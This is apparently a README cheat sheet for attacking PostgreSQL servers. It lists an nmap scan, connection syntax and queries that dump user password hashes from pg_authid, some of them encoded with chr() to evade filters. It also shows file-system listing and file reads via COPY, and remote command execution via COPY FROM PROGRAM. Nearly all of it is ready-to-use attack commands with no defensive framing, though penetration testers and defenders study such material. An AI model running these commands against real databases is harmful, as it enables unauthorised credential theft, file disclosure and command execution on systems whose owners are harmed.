README.md

PostgreSQL enumeration and exploitation

• Initial enumeration
• Connecting to a PostgreSQL database
• Enumerating a database
• Arbitrary File Read (AFR)
• Remote Code Execution (RCE)

Initial enumeration

nmap -vv -p 5432 -sT --script=+pgsql* <ip>

Connecting to a PostgreSQL database

psql "dbname=<db_name> host=<ip> user=<username> password=<password> port=5432"

Enumerating a database

• Get version:

SELECT version();

• Get current database:

SELECT current_database();

• Get current user:

SELECT current_user;

• Get current user's password hash:

SELECT rolpassword FROM pg_catalog.pg_authid WHERE rolname=current_user

• List all users:

SELECT rolname FROM pg_catalog.pg_authid ORDER BY 1;

• Get default user's password hash:

SELECT rolpassword FROM pg_catalog.pg_authid WHERE rolname=(chr(112)||chr(111)||chr(115)||chr(116)||chr(103)||chr(114)||chr(101)||chr(115)) -- "postgres" user

• List tables:

SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1;

• List table columns:

SELECT column_name FROM information_schema.columns WHERE table_name='<table_name>' ORDER BY 1;

• Search for %user% like tables:

SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE chr(37)||chr(117)||chr(115)||chr(101)||chr(114)||chr(37) ORDER BY 1 LIMIT 1 OFFSET 0;

Arbitrary File Read (AFR)

• Directory listing:

select pg_ls_dir('<path>');

• Read a file:

DROP TABLE IF EXISTS temp;
CREATE TABLE temp(t TEXT);
COPY temp FROM '<file_path>';
SELECT * FROM temp;

Remote Code Execution (RCE)

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output TEXT);
COPY cmd_exec FROM PROGRAM '<payload>';
SELECT * FROM cmd_exec;